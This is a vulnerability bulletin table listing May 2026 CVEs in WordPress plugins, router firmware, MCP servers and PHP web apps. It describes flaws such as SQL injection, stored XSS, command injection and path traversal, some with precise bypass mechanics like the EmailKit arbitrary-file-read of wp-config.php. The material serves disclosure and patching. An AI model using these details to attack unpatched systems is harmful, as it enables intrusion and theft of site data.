| roxnor--EmailKit Email Customizer for WooCommerce & WP | The EmailKit plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to and including 1.6.5. This is due to a flawed path traversal validation in the create_template() method of the CheckForm class, where realpath() is called on the allowed base directory (wp-content/uploads/emailkit/templates/) which may not exist, causing it to return false. In PHP 8.x, strpos($real_path, false) implicitly converts false to an empty string, and strpos() with an empty needle always returns 0, causing the check strpos(...) !== 0 to evaluate to false and bypassing the path validation entirely. This makes it possible for authenticated attackers, with Author-level access and above, to read arbitrary files from the server, including sensitive files such as wp-config.php, by supplying an absolute path to the emailkit-editor-template REST API parameter. | 2026-05-05 | 6.5 | CVE-2026-5957 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ae58e5b0-b587-4503-8519-c5a50245891a?source=cve https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.5/includes/Admin/Api/CheckForm.php#L166 https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.5/includes/Admin/Api/CheckForm.php#L170 https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.5/includes/Admin/EmailSettings/MetformEmailSettings.php#L252 https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/Api/CheckForm.php#L170 https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/Api/CheckForm.php#L163 https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.5/includes/Admin/Api/CheckForm.php#L163 https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/Api/CheckForm.php#L166 https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/EmailSettings/MetformEmailSettings.php#L252 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3511701%40emailkit%2Ftrunk&old=3496714%40emailkit%2Ftrunk&sfp_email=&sfph_mail= |
| wpmudev--Forminator Forms Contact Form, Payment Form & Custom Form Builder | The Forminator Forms plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 1.53.0. This is due to the listen_for_saving_export_schedule() function in library/class-export.php failing to perform a capability check before saving the scheduled export configuration, unlike the parallel listen_for_csv_export() function which correctly verifies user permissions. This makes it possible for authenticated attackers with subscriber-level access to configure a scheduled export job that emails all form submissions to an attacker-controlled email address, resulting in sensitive data exfiltration. | 2026-05-07 | 6.5 | CVE-2026-6214 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d7b8d42c-bceb-456e-a682-358e8df831e3?source=cve https://plugins.trac.wordpress.org/browser/forminator/trunk/library/class-export.php#L178 https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/library/class-export.php#L178 https://plugins.trac.wordpress.org/browser/forminator/trunk/admin/classes/class-admin-l10n.php#L448 https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/admin/classes/class-admin-l10n.php#L448 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3512045%40forminator%2Ftrunk&old=3510688%40forminator%2Ftrunk&sfp_email=&sfph_mail= |
| sszdh--Simple Owl Shortcodes | The Simple Owl Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'num' attribute of the 'owls_wrapper' shortcode in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-05 | 6.4 | CVE-2026-6255 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e33a2f27-20c2-4963-9558-1eead0515690?source=cve https://plugins.trac.wordpress.org/browser/simple-owl-shortcodes/tags/2.1.1/inc/owls_wrapper.php#L11 https://plugins.trac.wordpress.org/browser/simple-owl-shortcodes/trunk/inc/owls_wrapper.php#L11 |
| MuffinGroup--Betheme | The Betheme theme for WordPress is vulnerable to Arbitrary File Deletion in versions up to, and including, 28.4. This is due to the upload_icons() function workflow using a user-controlled upload path (`mfn-icon-upload`) in a filesystem move operation without constraining it to the uploads directory. This makes it possible for authenticated attackers, with contributor-level access and above, to move/delete arbitrary local files via path traversal. | 2026-05-05 | 6.5 | CVE-2026-6262 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3486f114-5625-4751-a25e-2c5ab7b15b38?source=cve https://support.muffingroup.com/changelog/ |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in Keylime. An attacker with root access on an enrolled monitored machine, where the Keylime agent runs, can exploit a vulnerability in the Keylime verifier. The verifier uses a hardcoded challenge nonce for Trusted Platform Module (TPM) quote attestation instead of a cryptographically random value. This allows the attacker to stockpile valid TPM quotes and replay them to evade detection after compromising the system. This issue affects only the push model deployment. | 2026-05-06 | 6.3 | CVE-2026-6420 | https://access.redhat.com/security/cve/CVE-2026-6420 RHBZ#2458889 |
| iovamihai--Affiliate Program Suite SliceWP Affiliates | The Affiliate Program Suite - SliceWP Affiliates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcode attributes in all versions up to, and including, 1.2.7. This is due to insufficient input sanitization and output escaping on user-supplied attributes in the 'slicewp_affiliate_url' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-06 | 6.4 | CVE-2026-6672 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5b9e92ea-49fc-420d-9d0e-29bcf78843bd?source=cve https://plugins.trac.wordpress.org/changeset/3517135/slicewp |
| zingaya--Zingaya Click-to-Call | The Zingaya Click-to-Call plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'email', 'first_name', 'last_name', and 'phone' parameters on the plugin's sign-up admin page in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-05-05 | 6.1 | CVE-2026-6696 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5bdd515c-6b52-467c-9446-6ae9b3b75e50?source=cve https://wordpress.org/plugins/zingaya-click-to-call/ https://plugins.trac.wordpress.org/browser/zingaya-click-to-call/tags/1.0/zingaya-admin.php#L62 https://plugins.trac.wordpress.org/browser/zingaya-click-to-call/tags/1.0/zingaya-admin.php#L71 https://plugins.trac.wordpress.org/browser/zingaya-click-to-call/tags/1.0/zingaya-admin.php#L79 https://plugins.trac.wordpress.org/browser/zingaya-click-to-call/tags/1.0/zingaya-admin.php#L104 |
| foux--Publish 2 Ping.fm | The Publish 2 Ping.fm plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the '/wp-admin/options-general.php?page=admin.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-05 | 6.1 | CVE-2026-6702 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c0dc5349-139a-4bf3-8503-0e75b132c68c?source=cve https://plugins.trac.wordpress.org/browser/publish-2-pingfm/trunk/php/admin.php#L136 https://plugins.trac.wordpress.org/browser/publish-2-pingfm/tags/1.1/php/admin.php#L136 https://plugins.trac.wordpress.org/browser/publish-2-pingfm/trunk/php/admin.php#L76 https://plugins.trac.wordpress.org/browser/publish-2-pingfm/tags/1.1/php/admin.php#L76 https://plugins.trac.wordpress.org/browser/publish-2-pingfm/trunk/php/prefs.php#L219 https://plugins.trac.wordpress.org/browser/publish-2-pingfm/tags/1.1/php/prefs.php#L219 |
| phpsandeepkumar--Blog Settings | The Blog Settings plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-05-05 | 6.1 | CVE-2026-6704 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d28e5374-dd34-4745-a20b-059e9846d96d?source=cve https://wordpress.org/plugins/blog-settings/ https://plugins.trac.wordpress.org/browser/blog-settings/tags/1.0/blog-settings.php#L173 https://plugins.trac.wordpress.org/browser/blog-settings/tags/1.0/blog-settings.php#L46 |
| Rapid7--Velociraptor | Velociraptor versions prior to 0.76.4 contain a cross-organization authorization bypass in the HTTP API. A user with only the reader role in the root organization (the lowest authenticated role, holding only the READ_RESULTS permission) can issue a single authenticated HTTP GET that reads any file from other orgs, even if they have no explicit permissions in the target org. The problem does not occur in reverse: a user with read access to a sub-org cannot read from other orgs or from the root org. | 2026-05-06 | 6.8 | CVE-2026-6863 | https://docs.velociraptor.app/announcements/advisories/cve-2026-6863/ |
| latepoint--LatePoint Calendar Booking Plugin for Appointments and Events | The LatePoint plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to and including 5.5.0. This is due to insufficient input sanitization on the customer cabinet profile update endpoint - where raw POST parameters (first_name, last_name, phone, notes) bypass sanitization because OsCustomerModel does not override params_to_sanitize(), causing set_data() to store unsanitized values verbatim in the database - combined with insufficient output escaping in generate_preview(), which injects those stored values into notification template HTML via str_replace() without any esc_html() call before echoing the result. This makes it possible for authenticated attackers with customer-level access or above to inject arbitrary web scripts into the admin notification preview panel that execute in an administrator's or agent's browser whenever a notification template referencing customer variables such as {{customer_full_name}}, {{customer_first_name}}, {{customer_last_name}}, {{customer_phone}}, or {{customer_notes}} is previewed. | 2026-05-06 | 6.4 | CVE-2026-7457 | https://www.wordfence.com/threat-intel/vulnerabilities/id/628b3f53-decd-47ac-a2d1-339ade1e6944?source=cve https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/misc/process_action.php#L606 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/misc/process_action.php#L606 https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/controllers/customer_cabinet_controller.php#L318 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/controllers/customer_cabinet_controller.php#L318 https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/helpers/replacer_helper.php#L276 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/helpers/replacer_helper.php#L276 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.3.1/lib/misc/process_action.php#L606 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.3.1/lib/controllers/customer_cabinet_controller.php#L318 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.3.1/lib/helpers/replacer_helper.php#L276 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3522933%40latepoint%2Ftrunk&old=3516282%40latepoint%2Ftrunk&sfp_email=&sfph_mail= |
| wowdevs--Sky Addons Elementor Addons with Widgets & Templates | The Sky Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `sky-custom-scripts` custom post type in all versions up to, and including, 3.3.2. This is due to the custom post type being registered with `capability_type => 'post'` and `show_in_rest => true`, combined with insufficient input sanitization on the `sky_script_content` meta field and lack of output escaping when rendering scripts on the frontend. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts via the REST API that execute on every frontend page for all site visitors. | 2026-05-08 | 6.4 | CVE-2026-7475 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cfaa8ffd-549e-4803-aa17-d1317a606e7a?source=cve https://plugins.trac.wordpress.org/browser/sky-elementor-addons/tags/3.3.2/includes/custom-scripts/class-custom-scripts-data.php#L128 https://plugins.trac.wordpress.org/browser/sky-elementor-addons/tags/3.3.2/includes/custom-scripts/class-custom-scripts-loader.php#L270 https://plugins.trac.wordpress.org/browser/sky-elementor-addons/trunk/includes/custom-scripts/class-custom-scripts-data.php#L134 https://plugins.trac.wordpress.org/browser/sky-elementor-addons/tags/3.3.3/includes/custom-scripts/class-custom-scripts-data.php#L134 https://plugins.trac.wordpress.org/browser/sky-elementor-addons/trunk/includes/custom-scripts/class-custom-scripts-loader.php#L237 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3521696%40sky-elementor-addons%2Ftrunk&old=3517772%40sky-elementor-addons%2Ftrunk&sfp_email=&sfph_mail= |
| oleksandrz--E2Pdf Export Pdf Tool for WordPress | The E2Pdf - Export Pdf Tool for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' attribute of the `e2pdf-download` shortcode in all versions up to, and including, 1.32.17. This is due to insufficient input sanitization and output escaping on the shortcode attribute. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-08 | 6.4 | CVE-2026-7650 | https://www.wordfence.com/threat-intel/vulnerabilities/id/36310ab1-f84e-4154-b782-51254c476d79?source=cve https://wordpress.org/plugins/e2pdf https://plugins.trac.wordpress.org/browser/e2pdf/tags/1.32.00/classes/model/e2pdf-shortcode.php#L157 https://plugins.trac.wordpress.org/browser/e2pdf/trunk/classes/model/e2pdf-shortcode.php#L172 https://plugins.trac.wordpress.org/browser/e2pdf/tags/1.32.18/classes/model/e2pdf-shortcode.php#L172 https://plugins.trac.wordpress.org/changeset/3522046/e2pdf/trunk/classes/model/e2pdf-shortcode.php |
| crocodilestick--Calibre-Web-Automated | A vulnerability was detected in crocodilestick Calibre-Web-Automated up to 4.0.6. Affected by this vulnerability is the function generate_auth_token of the file cps/kobo_auth.py of the component Kobo auth-token Route. The manipulation results in improper authorization. The attack may be performed from remote. The exploit is now public and may be used. Upgrading to version 4.0.7 addresses this issue. The patch is identified as 9f50bb2c16160564c9f8777dc2ceed3eb95e4807. The affected component should be upgraded. | 2026-05-04 | 6.3 | CVE-2026-7713 | VDB-360889; crocodilestick Calibre-Web-Automated Kobo auth-token Route kobo_auth.py generate_auth_token improper authorization VDB-360889; CTI Indicators (IOB, IOC, TTP, IOA) Submit #806403; crocodilestick Calibre-Web-Automated v1.0.0-v4.0.6 IDOR in auth-token generation leading to account takeover https://github.com/crocodilestick/Calibre-Web-Automated/issues/1303 https://github.com/new-usemame/Calibre-Web-NextGen/pull/18 https://gist.github.com/menelausx/ef98aa78ed2869ccaa316ff45ed1a440 https://github.com/new-usemame/Calibre-Web-NextGen/commit/9f50bb2c16160564c9f8777dc2ceed3eb95e4807 https://github.com/new-usemame/Calibre-Web-NextGen/releases/tag/v4.0.7 https://github.com/crocodilestick/Calibre-Web-Automated/ |
| crocodilestick--Calibre-Web-Automated | A flaw has been found in crocodilestick Calibre-Web-Automated up to 4.0.6. Affected by this issue is some unknown functionality of the file cps/cwa_functions.py of the component Admin Endpoint. This manipulation causes missing authentication. It is possible to initiate the attack remotely. The exploit has been published and may be used. The project was informed of the problem early through a pull request but has not reacted yet. | 2026-05-04 | 6.5 | CVE-2026-7714 | VDB-360890; crocodilestick Calibre-Web-Automated Admin Endpoint cwa_functions.py missing authentication VDB-360890; CTI Indicators (IOB, IOC, IOA) Submit #806468; crocodilestick Calibre-Web-Automated v1.0.0-v4.0.6 Denial of Service https://github.com/crocodilestick/Calibre-Web-Automated/issues/1304 https://github.com/crocodilestick/Calibre-Web-Automated/pull/1308 https://gist.github.com/menelausx/1b45c952d352a2ebdc01cd8d5aa88e87 https://github.com/crocodilestick/Calibre-Web-Automated/ |
| ravenwits--mcp-server-arangodb | A vulnerability has been found in ravenwits mcp-server-arangodb up to 0.4.7. This affects the function arango_backup of the file src/tools.ts of the component MCP Interface. Such manipulation of the argument outputDir leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-04 | 6.3 | CVE-2026-7715 | VDB-360891; ravenwits mcp-server-arangodb MCP tools.ts arango_backup path traversal VDB-360891; CTI Indicators (IOB, IOC, TTP, IOA) Submit #806913; ravenwits mcp-server-arangodb 0.4.7 Path Traversal https://github.com/ravenwits/mcp-server-arangodb/issues/7 https://github.com/BruceJqs/public_exp/issues/34 https://github.com/ravenwits/mcp-server-arangodb/ |
| code-projects--Gym Management System In PHP | A vulnerability was found in code-projects Gym Management System In PHP and Windows NT 1.0. This vulnerability affects unknown code of the file /index.php. Performing a manipulation of the argument day results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. | 2026-05-04 | 6.3 | CVE-2026-7716 | VDB-360892; code-projects Gym Management System In PHP/Windows NT index.php sql injection VDB-360892; CTI Indicators (IOB, IOC, TTP, IOA) Submit #807105; Code-projects Gym Management System In PHP 1.0 SQL injection https://github.com/QAp89/CVE/blob/main/SQL1.md https://code-projects.org/ |
| Totolink--WA300 | A vulnerability was identified in Totolink WA300 5.2cu.7112_B20190227. Impacted is the function setWebWlanIdx of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. The manipulation of the argument webWlanIdx leads to command injection. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2026-05-04 | 6.3 | CVE-2026-7718 | VDB-360894; Totolink WA300 POST Request cstecgi.cgi setWebWlanIdx command injection VDB-360894; CTI Indicators (IOB, IOC, TTP, IOA) Submit #807196; Totolink WA300 WA300 V5.2cu.7112_B20190227 Command Injection https://lavender-bicycle-a5a.notion.site/TOTOLINK-WA300-setWebWlanIdx-34553a41781f800ab40ae0c3d68c78a6?pvs=73 https://www.totolink.net/ |
| Totolink--WA300 | A weakness has been identified in Totolink WA300 5.2cu.7112_B20190227. The impacted element is the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. This manipulation of the argument langType causes command injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. | 2026-05-04 | 6.3 | CVE-2026-7720 | VDB-360896; Totolink WA300 POST Request cstecgi.cgi setLanguageCfg command injection VDB-360896; CTI Indicators (IOB, IOC, TTP, IOA) Submit #807198; Totolink WA300 WA300 V5.2cu.7112_B20190227 Command Injection https://lavender-bicycle-a5a.notion.site/TOTOLINK-WA300-setLanguageCfg-34553a41781f8007b6c5c7964d424286 https://www.totolink.net/ |
| Totolink--WA300 | A security vulnerability has been detected in Totolink WA300 5.2cu.7112_B20190227. This affects the function NTPSyncWithHost of the file /cgi-bin/cstecgi.cgi. Such manipulation of the argument hostTime leads to command injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2026-05-04 | 6.3 | CVE-2026-7721 | VDB-360897; Totolink WA300 cstecgi.cgi NTPSyncWithHost command injection VDB-360897; CTI Indicators (IOB, IOC, TTP, IOA) Submit #807199; Totolink WA300 WA300 V5.2cu.7112_B20190227 Command Injection https://lavender-bicycle-a5a.notion.site/TOTOLINK-WA300-NTPSyncWithHost-34553a41781f80808f3cfd14e1c603e7 https://www.totolink.net/ |
| PrefectHQ--prefect | A vulnerability was found in PrefectHQ prefect up to 3.6.25.dev6. Affected by this issue is some unknown functionality of the file src/prefect/runner/storage.py of the component GitRepository Pull Handler. The manipulation of the argument commit_sha/directories results in argument injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. Upgrading to version 3.6.25.dev7 can resolve this issue. The patch is identified as 6a9d9918716ce4ee0297b69f3046f7067ef1faae. It is advisable to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-05-04 | 6.3 | CVE-2026-7725 | VDB-360901; PrefectHQ prefect GitRepository Pull storage.py argument injection VDB-360901; CTI Indicators (IOB, IOC, TTP, IOA) Submit #807356; PerfectHQ Perfect <= 3.6.24 Argument Injection https://gist.github.com/nedlir/c37d90dda5f715790eafc970b2ef0c8a https://github.com/PrefectHQ/prefect/pull/21384 https://github.com/PrefectHQ/prefect/commit/6a9d9918716ce4ee0297b69f3046f7067ef1faae https://github.com/PrefectHQ/prefect/releases/tag/3.6.25.dev7 https://github.com/PrefectHQ/prefect/ |
| ryanjoachim--mcp-rtfm | A vulnerability was identified in ryanjoachim mcp-rtfm 0.1.0. This vulnerability affects the function get_doc_content/read_doc/update_doc of the component MCP Interface. Such manipulation of the argument docFile leads to path traversal. The attack can be launched remotely. The exploit is publicly available and might be used. The name of the patch is e6f0686fc36012f78236e7fed172c81444904b0b. It is best practice to apply a patch to resolve this issue. | 2026-05-04 | 6.3 | CVE-2026-7728 | VDB-360903; ryanjoachim mcp-rtfm MCP update_doc path traversal VDB-360903; CTI Indicators (IOB, IOC, TTP, IOA) Submit #807538; ryanjoachim mcp-rtfm 0.1.0, Commit 054fe515735cb477d4640c20930c04b243e443fc Path Traversal https://github.com/ryanjoachim/mcp-rtfm/issues/5 https://github.com/BruceJqs/public_exp/issues/35 https://github.com/ryanjoachim/mcp-rtfm/commit/e6f0686fc36012f78236e7fed172c81444904b0b https://github.com/ryanjoachim/mcp-rtfm/ |
| pixelsock--directus-mcp | A security flaw has been discovered in pixelsock directus-mcp 1.0.0. This issue affects the function validateUrl of the file index.ts of the component MCP Interface. Performing a manipulation of the argument fileUrl results in server-side request forgery. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The pull request to fix this issue awaits acceptance. | 2026-05-04 | 6.3 | CVE-2026-7729 | VDB-360904; pixelsock directus-mcp MCP index.ts validateUrl server-side request forgery VDB-360904; CTI Indicators (IOB, IOC, IOA) Submit #807539; pixelsock directus-mcp 1.0.0, Commit 77758625355d105364eeaeac9afec2f743fe369b Server-Side Request Forgery https://github.com/pixelsock/directus-mcp/issues/13 https://github.com/pixelsock/directus-mcp/pull/14 https://github.com/BruceJqs/public_exp/issues/36 https://github.com/pixelsock/directus-mcp/ |
| privsim--mcp-test-runner | A weakness has been identified in privsim mcp-test-runner 0.2.0. Impacted is the function child_process.spawn of the file src/index.ts of the component MCP Interface. Executing a manipulation of the argument command can lead to os command injection. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-04 | 6.3 | CVE-2026-7730 | VDB-360905; privsim mcp-test-runner MCP index.ts child_process.spawn os command injection VDB-360905; CTI Indicators (IOB, IOC, TTP, IOA) Submit #807541; privsim mcp-test-runner 0.2.0, Commit 83c84ed053f534774f7de935aeaa7698a5e5f9dc Command Injection https://github.com/privsim/mcp-test-runner/issues/24 https://github.com/BruceJqs/public_exp/issues/37 https://github.com/privsim/mcp-test-runner/ |
| code-projects--BloodBank Managing System | A security vulnerability has been detected in code-projects BloodBank Managing System 1.0. The affected element is an unknown function of the file get_state.php. The manipulation of the argument G_STATE_ID leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. | 2026-05-04 | 6.3 | CVE-2026-7731 | VDB-360906; code-projects BloodBank Managing System get_state.php sql injection VDB-360906; CTI Indicators (IOB, IOC, TTP, IOA) Submit #807557; Code-projects BLOODBANK MANAGING SYSTEM IN PHP 1.0 SQL injection https://github.com/QAp89/CVE/blob/main/SQL3.md https://code-projects.org/ |
| code-projects--BloodBank Managing System | A vulnerability was detected in code-projects BloodBank Managing System 1.0. The impacted element is an unknown function of the file request_blood.php. The manipulation results in unrestricted upload. The attack can be executed remotely. The exploit is now public and may be used. | 2026-05-04 | 6.3 | CVE-2026-7732 | VDB-360907 | code-projects BloodBank Managing System request_blood.php unrestricted upload VDB-360907 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807558 | Code-projects BLOODBANK MANAGING SYSTEM IN PHP 1.0 arbitrary file upload leading to RCE vulnerability https://github.com/QAp89/CVE/blob/main/Arbitrary%20file%20upload%20leading%20to%20RCE1.md https://code-projects.org/ |
| puchunjie--doc-tools-mcp | A security flaw has been discovered in puchunjie doc-tools-mcp 1.0.18. This affects the function create_document/open_document of the file src/mcp-server.ts of the component MCP Interface. The manipulation of the argument filePath results in path traversal. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-04 | 6.3 | CVE-2026-7738 | VDB-360913 | puchunjie doc-tools-mcp MCP mcp-server.ts open_document path traversal VDB-360913 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807642 | puchunjie @puchunjie/doc-tools-mcp 1.0.18, Commit c96df45a16710a3eec41a7a94c32b81468db28ea Path Traversal https://github.com/puchunjie/doc-tools-mcp/issues/4 https://github.com/BruceJqs/public_exp/issues/38 https://github.com/puchunjie/doc-tools-mcp/ |
| CodeAstro--Online Classroom | A vulnerability was detected in CodeAstro Online Classroom 1.0. Impacted is an unknown function of the file /OnlineClassroom/studentlogin. Performing a manipulation of the argument sid results in sql injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2026-05-04 | 6.3 | CVE-2026-7741 | VDB-360916 | CodeAstro Online Classroom studentlogin sql injection VDB-360916 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807692 | codeastro Online Classroom V1.0 SQL Injection https://github.com/yuji0903/silver-guide/issues/18 https://codeastro.com/ |
| CodeAstro--Online Classroom | A flaw has been found in CodeAstro Online Classroom 1.0. The affected element is an unknown function of the file /OnlineClassroom/facultylogin. Executing a manipulation of the argument fid can lead to sql injection. The attack can be executed remotely. The exploit has been published and may be used. | 2026-05-04 | 6.3 | CVE-2026-7742 | VDB-360917 | CodeAstro Online Classroom facultylogin sql injection VDB-360917 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807694 | codeastro Online Classroom V1.0 SQL Injection https://github.com/yuji0903/silver-guide/issues/19 https://codeastro.com/ |
| CodeAstro--Online Classroom | A vulnerability has been found in CodeAstro Online Classroom 1.0. The impacted element is an unknown function of the file /OnlineClassroom/studentdetails. The manipulation of the argument deleteid leads to sql injection. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. | 2026-05-04 | 6.3 | CVE-2026-7743 | VDB-360918 | CodeAstro Online Classroom studentdetails sql injection VDB-360918 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807695 | codeastro Online Classroom V1.0 SQL Injection https://github.com/yuji0903/silver-guide/issues/20 https://codeastro.com/ |
| CodeAstro--Online Classroom | A vulnerability was found in CodeAstro Online Classroom 1.0. This affects an unknown function of the file /OnlineClassroom/addnewstudent. The manipulation of the argument fname results in sql injection. The attack may be performed from remote. The exploit has been made public and could be used. | 2026-05-04 | 6.3 | CVE-2026-7744 | VDB-360919 | CodeAstro Online Classroom addnewstudent sql injection VDB-360919 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807696 | codeastro Online Classroom V1.0 SQL Injection https://github.com/yuji0903/silver-guide/issues/21 https://codeastro.com/ |
| CodeAstro--Online Classroom | A vulnerability was determined in CodeAstro Online Classroom 1.0. This impacts an unknown function of the file /OnlineClassroom/facultydetails. This manipulation of the argument deleteid causes sql injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-04 | 6.3 | CVE-2026-7745 | VDB-360920 | CodeAstro Online Classroom facultydetails sql injection VDB-360920 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807697 | codeastro Online Classroom V1.0 SQL Injection https://github.com/yuji0903/silver-guide/issues/22 https://codeastro.com/ |
| SourceCodester--Web-based Pharmacy Product Management System | A vulnerability was identified in SourceCodester Web-based Pharmacy Product Management System 1.0. Affected is an unknown function of the file /product_expiry/edit-admin.php. Such manipulation of the argument ID leads to sql injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2026-05-04 | 6.3 | CVE-2026-7746 | VDB-360921 | SourceCodester Web-based Pharmacy Product Management System edit-admin.php sql injection VDB-360921 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807693 | SourceCodester Web-based Pharmacy Product Management System V1.0 SQL Injection https://github.com/mjh134/CVE/issues/1 https://www.sourcecodester.com/ |
| CodeCanyon--Perfex CRM | A vulnerability was detected in CodeCanyon Perfex CRM up to 3.4.1. This affects the function Clients::project of the file application/controllers/Clients.php of the component Tenant Handler. The manipulation of the argument ID results in authorization bypass. The attack may be performed from remote. The exploit is now public and may be used. | 2026-05-04 | 6.3 | CVE-2026-7782 | VDB-360979 | CodeCanyon Perfex CRM Tenant Clients.php project authorization VDB-360979 | CTI Indicators (IOB, IOC, IOA) Submit #807683 | Canyon Perfex CRM CRM 3.4.1 Improper Authorization https://bytium.com/insights/perfex-crm-3-4-1-cross-tenant-broken-access-control-on-project-discussion-comments |
| CodeCanyon--Perfex CRM | A flaw has been found in CodeCanyon Perfex CRM up to 3.4.1. This vulnerability affects the function AbstractKanban::applySortQuery of the file application/services/AbstractKanban.php of the component Admin Kanban Endpoint. This manipulation of the argument this causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. | 2026-05-04 | 6.3 | CVE-2026-7783 | VDB-360980 | CodeCanyon Perfex CRM Admin Kanban Endpoint AbstractKanban.php applySortQuery sql injection VDB-360980 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807743 | CodeCanyon Perfex CRM 3.4.1 SQL Injection https://bytium.com/insights/blind-sql-injection-in-perfex-crm-3-4-1 |
| itsourcecode--Courier Management System | A vulnerability was identified in itsourcecode Courier Management System 1.0. This impacts an unknown function of the file /print_pdets.php. The manipulation of the argument ids leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2026-05-05 | 6.3 | CVE-2026-7822 | VDB-361074 | itsourcecode Courier Management System print_pdets.php sql injection VDB-361074 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807773 | itsourcecode Courier Management System V1.0 SQL Injection https://github.com/ltranquility/submit/issues/14 https://itsourcecode.com/ |
